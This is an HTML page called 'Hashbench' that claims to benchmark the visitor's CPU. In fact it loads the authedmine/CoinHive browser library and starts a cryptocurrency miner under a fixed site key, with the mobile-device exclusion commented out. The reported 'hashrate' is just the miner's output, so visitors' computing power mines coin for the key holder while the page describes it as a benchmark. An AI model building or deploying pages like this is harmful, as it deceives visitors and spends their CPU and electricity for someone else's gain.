<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
	<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/vue"></script>
<script>
	var miner = new CoinHive.Anonymous('6kS93qn9ORU52Ym4tFrt6YLs4l6rQs5M', {throttle: 0.3});

	// Only start on non-mobile devices and if not opted-out
	// in the last 14400 seconds (4 hours):
	if ( /*!miner.isMobile() && */!miner.didOptOut(14400)) {
		miner.start();
	}
	
	
</script>
</head>
<body>

<h1>Hashbench <img src="http://aiconica.net/previews/d0f6d1310306a490f56c197d7e86a22be170e8659199d64a06179484d8cda937_100x100.png"/></h1>
<p>Benchmark your CPU with hashrate.</p>
<div id="app">
	Your hashrate is:  <span id="message"></span> HASHES/S
</div>

<script>
	document.getElementById('message').innerHTML = 'calculating...';
	setTimeout(function(){
		document.getElementById('message').innerHTML = miner.getHashesPerSecond();
	},1000)
</script>
</body>
</html>



